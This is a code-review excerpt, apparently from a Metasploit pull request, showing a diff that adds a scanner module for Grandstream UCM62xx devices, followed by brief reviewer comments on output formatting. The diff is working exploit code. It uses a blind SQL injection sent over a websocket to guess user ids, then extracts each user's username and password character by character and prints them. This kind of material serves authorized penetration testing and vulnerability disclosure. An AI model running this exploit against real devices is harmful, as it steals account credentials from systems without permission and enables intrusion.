modules/auxiliary/scanner/http/grandstream_ucm62xx_sql_account_guess.rb

```diff
@@ -0,0 +1,219 @@
+
+      return n
+    end
+
+    return 0
+  end
+
+  # A generic injection to guess a string field. This implementation guesses all printable
+  # characters (which is inline with allowed password values). It excludes \ since, while
+  # the user can technically use it in a password, you can't actually log in if the character
+  # is present. Returns the guessed value
+  def guess_string(id, field, length)
+    string = ''
+    length.times do |n|
+      for printable in 0x20...0x7e
+
+        next unless printable != 0x5c
+
+        char = printable.chr
+
+        wsock = connect_ws(
+          'method' => 'GET',
+          'uri' => normalize_uri(target_uri.path, '/websockify')
+        )
+        temp_string = string + char
+
+        wsock.put_wstext(create_injection_request("\' OR user_id=#{id} AND substr(#{field},1,#{temp_string.length})='#{temp_string}'--"))
+        next unless recv_wsframe(wsock) == 0
+
+        string.concat(char)
+        return string if string.length == length
+
+        break
+      end
+
+      # if string.length != n+1 then we failed to guess a character
+      return '' unless string.length == (n + 1)
+    end
+
+    ''
+  end
+
+  # Extract the version from the cgi endpoint and return true if the
+  # reported version is affected by the vulnerability.
+  def check_version
+    normalized_uri = normalize_uri(target_uri.path, '/cgi')
+    print_status("Requesting version information from #{normalized_uri}")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalized_uri,
+      'vars_post' => { 'action' => 'getInfo' }
+    })
+
+    return false unless res&.code == 200
+
+    body_json = res.get_json_document
+    return false unless body_json
+
+    prog_version = body_json.dig('response', 'prog_version')
+    return false if prog_version.nil?
+
+    print_status("The reported version is: #{prog_version}")
+
+    version = Rex::Version.new(prog_version)
+    return version < Rex::Version.new('1.0.20.22')
+  end
+
+  def run_host(_ip)
+    # do a version check so the attacker doesn't waste their time
+    if !check_version
+      print_error('The reported version is not vulnable')
+      return
+    end
+
+    # attack happens in three parts:
+    # - guess user ids
+    # - for each id:
+    #   - guess username
+    #   - guess password
+    discovered_ids = guess_user_ids
+    print_status("Found #{discovered_ids.length} valid user ids")
+
+    discovered_ids.each do |id|
+      username_length = guess_field_length(id, 'user_name')
+      next unless username_length != 0
+
+      username = guess_string(id, 'user_name', username_length)
+      next if username.empty?
+
+      print_status("Found username: #{username}")
+
+      password_length = guess_field_length(id, 'user_password')
+      next unless password_length != 0
+
+      password = guess_string(id, 'user_password', password_length)
+      next if password.empty?
+
+      print_status("Found password: #{password}")
```

Comment:
See earlier comment, we should really print out the password corresponding to each user if possible rather than printing them out separately. If its blank we can use a placeholder like `{BLANK}` instead or just leave the part after the separator blank.

This will make the output easier to read and will also allow one to correlate the username with the corresponding password.

Reply:
I adjusted the output. Feel free to alter as you see fit.

For what it's worth, blank is not a possible password.

Reply:
@jbaines-r7 This looks much better, thanks for adjusting this!